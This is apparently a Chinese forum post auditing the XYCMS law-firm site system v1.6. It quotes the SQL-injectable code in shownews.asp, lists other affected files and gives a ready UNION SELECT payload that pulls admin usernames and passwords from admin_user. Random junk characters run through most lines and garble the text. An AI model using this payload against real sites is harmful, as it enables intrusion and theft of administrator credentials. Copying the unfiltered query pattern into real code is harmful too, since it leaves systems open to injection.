前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似" E$ ?- R$ D& Y6 R1 E5 Y- K
" i" a4 ~. S/ i6 U' _5 i8 j淫荡分割线
, v1 M+ U( M; d5 [% [4 O" G--------------------------------------------------------
6 A4 ~3 ]% a) s- } , [' ^ N5 e! h
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
6 |$ Y# ^* g. x$ z) K! S+ {源码地址:http://down.chinaz.com/soft/29233.htm
( l2 ^1 V- c+ x/ x0 u4 L% x2 o6 G
3 a" s3 U9 v. E" `/ l4 J) x漏洞文件:shownews.asp
, v$ v D7 @+ h$ m" Z) y漏洞代码:7-13行
4 E' N) A+ q8 O& V; N: z
8 E5 h' W* y9 x3 p8 I9 {: _, j - m2 V( {+ Y9 H2 F+ x; d
<% 4 C. l& T9 ~$ @" x
id=request.QueryString("id"): D$ J; f8 Z/ V; {
) b5 D. f, c% G0 [
set snews=server.createobject("adodb.recordset")
; H9 y2 m6 q5 d3 Q6 l" s' fexec="select * from [news] where id="&id" @4 ]% }: C; m% k8 u# d
snews.open exec,conn,1,1
: g* _" F U7 V# r) T3 \2 }3 l%>7 ~6 d6 o0 a# N' ] Y P, T
; n: _' ~/ Z. f0 z; p
" d0 B! r" v" B5 g
什么过滤都没有 直造成注入
% M7 Q# H% J, H2 B) O* w
" |% x- B- A2 Z0 E, x: q! T+ P注入点:http://127.0.0.1:99/shownews.asp?id=xx
+ l! e3 W2 g! X4 C3 S * B- W/ G. n! a2 [6 A9 q: r! A4 J! i
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找7 O: D$ Y! E( X5 {# g- T! O& S
1 M* O, c3 O7 j2 d
" c' m6 N. F1 g( t& Bexp: union select 1,admin,password,4,5,7 from admin_user8 t# w/ ^( |; y/ `# C
: L; c3 i4 C% J% S
|
发表于 2013-4-4 17:28:12
收藏
支持
反对